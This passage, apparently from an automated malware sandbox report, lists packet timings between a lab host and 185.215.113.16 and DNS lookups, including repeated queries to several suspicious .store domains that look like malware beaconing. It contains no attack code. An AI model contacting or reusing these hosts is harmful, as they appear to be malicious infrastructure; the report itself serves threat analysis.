Nov 11, 2024 10:33:31.449886084 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.449913979 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450141907 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450155973 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450184107 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450193882 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450196028 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450211048 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450222969 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450231075 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450234890 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450247049 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450278044 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450334072 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450346947 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450357914 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450368881 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450381041 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450381041 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450397968 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450407028 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450413942 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450424910 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450436115 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450448036 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450474977 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450731993 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450742960 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450756073 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450783968 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450809956 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450880051 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450891972 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450903893 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450917006 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450930119 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450932026 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450941086 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450952053 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450956106 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.450983047 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.450984955 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451013088 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451020002 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451031923 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451041937 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451045036 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451051950 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451066017 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451081038 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451088905 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451102972 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451121092 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451121092 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451136112 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451147079 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451159000 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451163054 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451175928 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451184034 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451189041 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451195955 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451200962 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451212883 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451220036 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451225996 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451236963 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451239109 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451248884 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451265097 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451268911 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451276064 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451282978 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451307058 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451309919 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451328993 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451332092 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451340914 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451353073 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451358080 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451375961 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451386929 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451396942 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451400995 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451416016 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451425076 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451430082 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451442003 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451453924 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451455116 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451481104 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451493025 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451535940 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451546907 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451559067 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451570988 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451582909 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451608896 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451622009 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451639891 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451651096 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451658964 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451680899 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451687098 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451695919 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451709032 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451711893 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451723099 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451725960 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451736927 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451761007 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451781988 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451809883 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451822996 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451834917 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451859951 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451889992 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.451932907 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451945066 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451956987 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451968908 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451981068 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.451983929 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.452002048 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.452009916 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.452016115 CET	80	49908	185.215.113.16	192.168.2.5
Nov 11, 2024 10:33:31.452039003 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.452056885 CET	49908	80	192.168.2.5	185.215.113.16
Nov 11, 2024 10:33:31.452070951 CET	80	49908	185.215.113.16	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 11, 2024 10:33:06.811274052 CET	192.168.2.5	1.1.1.1	0x79f7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:06.811495066 CET	192.168.2.5	1.1.1.1	0x5110	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:09.376302004 CET	192.168.2.5	1.1.1.1	0xb96	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:09.376467943 CET	192.168.2.5	1.1.1.1	0xfed4	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:10.369440079 CET	192.168.2.5	1.1.1.1	0xcc33	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:10.369595051 CET	192.168.2.5	1.1.1.1	0xa65f	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:17.406675100 CET	192.168.2.5	1.1.1.1	0x9279	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:17.407260895 CET	192.168.2.5	1.1.1.1	0xf7	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:18.935985088 CET	192.168.2.5	1.1.1.1	0xa63	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:18.936454058 CET	192.168.2.5	1.1.1.1	0x5d55	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 11, 2024 10:33:19.938760042 CET	192.168.2.5	1.1.1.1	0xe921	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:19.938967943 CET	192.168.2.5	1.1.1.1	0xc2bf	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:19.949482918 CET	192.168.2.5	1.1.1.1	0x7852	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:19.949666977 CET	192.168.2.5	1.1.1.1	0xfcfd	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:19.961096048 CET	192.168.2.5	1.1.1.1	0x3b8f	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:19.961219072 CET	192.168.2.5	1.1.1.1	0xc1bd	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:19.961657047 CET	192.168.2.5	1.1.1.1	0xfc54	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:19.961765051 CET	192.168.2.5	1.1.1.1	0x6384	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:22.022928953 CET	192.168.2.5	1.1.1.1	0x1de0	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.023160934 CET	192.168.2.5	1.1.1.1	0x593f	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:22.023566008 CET	192.168.2.5	1.1.1.1	0xd831	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.023695946 CET	192.168.2.5	1.1.1.1	0x8733	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:22.036673069 CET	192.168.2.5	1.1.1.1	0xa449	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.036859989 CET	192.168.2.5	1.1.1.1	0xa8c0	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 11, 2024 10:33:22.153800964 CET	192.168.2.5	1.1.1.1	0x1af2	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.154256105 CET	192.168.2.5	1.1.1.1	0x8d48	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 11, 2024 10:34:10.760694981 CET	192.168.2.5	1.1.1.1	0x4c4f	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.788677931 CET	192.168.2.5	1.1.1.1	0x6c68	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.812974930 CET	192.168.2.5	1.1.1.1	0xbd2d	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.838332891 CET	192.168.2.5	1.1.1.1	0x6aa2	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.863244057 CET	192.168.2.5	1.1.1.1	0x339b	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.888057947 CET	192.168.2.5	1.1.1.1	0x8e58	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.912885904 CET	192.168.2.5	1.1.1.1	0xcc76	Standard query (0)	navygenerayk.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.630980968 CET	192.168.2.5	1.1.1.1	0x7c20	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.631103992 CET	192.168.2.5	1.1.1.1	0x597b	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 11, 2024 10:34:19.635925055 CET	192.168.2.5	1.1.1.1	0xae66	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.636059046 CET	192.168.2.5	1.1.1.1	0x6526	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 11, 2024 10:34:19.636317015 CET	192.168.2.5	1.1.1.1	0xf907	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.636523008 CET	192.168.2.5	1.1.1.1	0xf283	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 11, 2024 10:34:25.951411009 CET	192.168.2.5	1.1.1.1	0xb564	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:25.978974104 CET	192.168.2.5	1.1.1.1	0x503e	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:26.005989075 CET	192.168.2.5	1.1.1.1	0x29ba	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:26.032048941 CET	192.168.2.5	1.1.1.1	0x4726	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:26.058182001 CET	192.168.2.5	1.1.1.1	0xfa46	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:26.082040071 CET	192.168.2.5	1.1.1.1	0xdf47	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:49.899528980 CET	192.168.2.5	1.1.1.1	0x294e	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:49.928323030 CET	192.168.2.5	1.1.1.1	0xdc01	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:49.954941034 CET	192.168.2.5	1.1.1.1	0xed1c	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:49.977924109 CET	192.168.2.5	1.1.1.1	0x6c67	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:50.001465082 CET	192.168.2.5	1.1.1.1	0xce0a	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:50.026567936 CET	192.168.2.5	1.1.1.1	0xbcdb	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 11, 2024 10:33:06.818496943 CET	1.1.1.1	192.168.2.5	0x79f7	No error (0)	www.google.com		142.250.185.100	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:06.819367886 CET	1.1.1.1	192.168.2.5	0x5110	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 11, 2024 10:33:09.384557009 CET	1.1.1.1	192.168.2.5	0xb96	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:09.384557009 CET	1.1.1.1	192.168.2.5	0xb96	No error (0)	plus.l.google.com		172.217.16.142	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:09.384861946 CET	1.1.1.1	192.168.2.5	0xfed4	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:10.376375914 CET	1.1.1.1	192.168.2.5	0xcc33	No error (0)	play.google.com		142.250.185.174	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:17.413642883 CET	1.1.1.1	192.168.2.5	0x9279	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:17.414647102 CET	1.1.1.1	192.168.2.5	0xf7	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:17.693345070 CET	1.1.1.1	192.168.2.5	0x78ea	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:17.693345070 CET	1.1.1.1	192.168.2.5	0x78ea	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:17.702250957 CET	1.1.1.1	192.168.2.5	0x11c0	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:18.943437099 CET	1.1.1.1	192.168.2.5	0x5d55	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:18.943766117 CET	1.1.1.1	192.168.2.5	0xa63	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:19.945317984 CET	1.1.1.1	192.168.2.5	0xe921	No error (0)	sb.scorecardresearch.com		18.244.18.122	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:19.945317984 CET	1.1.1.1	192.168.2.5	0xe921	No error (0)	sb.scorecardresearch.com		18.244.18.27	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:19.945317984 CET	1.1.1.1	192.168.2.5	0xe921	No error (0)	sb.scorecardresearch.com		18.244.18.38	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:19.945317984 CET	1.1.1.1	192.168.2.5	0xe921	No error (0)	sb.scorecardresearch.com		18.244.18.32	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:19.956191063 CET	1.1.1.1	192.168.2.5	0x7852	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:19.956686974 CET	1.1.1.1	192.168.2.5	0xfcfd	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:19.967750072 CET	1.1.1.1	192.168.2.5	0x3b8f	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:19.968175888 CET	1.1.1.1	192.168.2.5	0xc1bd	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:19.968641043 CET	1.1.1.1	192.168.2.5	0x6384	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:19.968827009 CET	1.1.1.1	192.168.2.5	0xfc54	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:22.029855013 CET	1.1.1.1	192.168.2.5	0x593f	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 11, 2024 10:33:22.030107975 CET	1.1.1.1	192.168.2.5	0xd831	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.030107975 CET	1.1.1.1	192.168.2.5	0xd831	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.030410051 CET	1.1.1.1	192.168.2.5	0x8733	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 11, 2024 10:33:22.031980991 CET	1.1.1.1	192.168.2.5	0x1de0	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.031980991 CET	1.1.1.1	192.168.2.5	0x1de0	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.043463945 CET	1.1.1.1	192.168.2.5	0xa449	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.043463945 CET	1.1.1.1	192.168.2.5	0xa449	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.043761969 CET	1.1.1.1	192.168.2.5	0xa8c0	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 11, 2024 10:33:22.160640955 CET	1.1.1.1	192.168.2.5	0x1af2	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:33:22.160640955 CET	1.1.1.1	192.168.2.5	0x1af2	No error (0)	googlehosted.l.googleusercontent.com		142.250.186.161	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:33:22.162247896 CET	1.1.1.1	192.168.2.5	0x8d48	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 11, 2024 10:34:10.783483982 CET	1.1.1.1	192.168.2.5	0x4c4f	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.811259985 CET	1.1.1.1	192.168.2.5	0x6c68	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.835519075 CET	1.1.1.1	192.168.2.5	0xbd2d	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.860558033 CET	1.1.1.1	192.168.2.5	0x6aa2	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.885571003 CET	1.1.1.1	192.168.2.5	0x339b	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.909914970 CET	1.1.1.1	192.168.2.5	0x8e58	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.952831984 CET	1.1.1.1	192.168.2.5	0xcc76	No error (0)	navygenerayk.store		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:10.952831984 CET	1.1.1.1	192.168.2.5	0xcc76	No error (0)	navygenerayk.store		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.638648033 CET	1.1.1.1	192.168.2.5	0x7c20	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.638648033 CET	1.1.1.1	192.168.2.5	0x7c20	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.638664961 CET	1.1.1.1	192.168.2.5	0x597b	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 11, 2024 10:34:19.642884016 CET	1.1.1.1	192.168.2.5	0xae66	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.642884016 CET	1.1.1.1	192.168.2.5	0xae66	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.642930031 CET	1.1.1.1	192.168.2.5	0x6526	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 11, 2024 10:34:19.643114090 CET	1.1.1.1	192.168.2.5	0xf907	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.643114090 CET	1.1.1.1	192.168.2.5	0xf907	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:19.643457890 CET	1.1.1.1	192.168.2.5	0xf283	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 11, 2024 10:34:25.974175930 CET	1.1.1.1	192.168.2.5	0xb564	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:26.002144098 CET	1.1.1.1	192.168.2.5	0x503e	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:26.028002024 CET	1.1.1.1	192.168.2.5	0x29ba	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 10:34:26.055046082 CET	1.1.1.1	192.168.2.5	0x4726	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
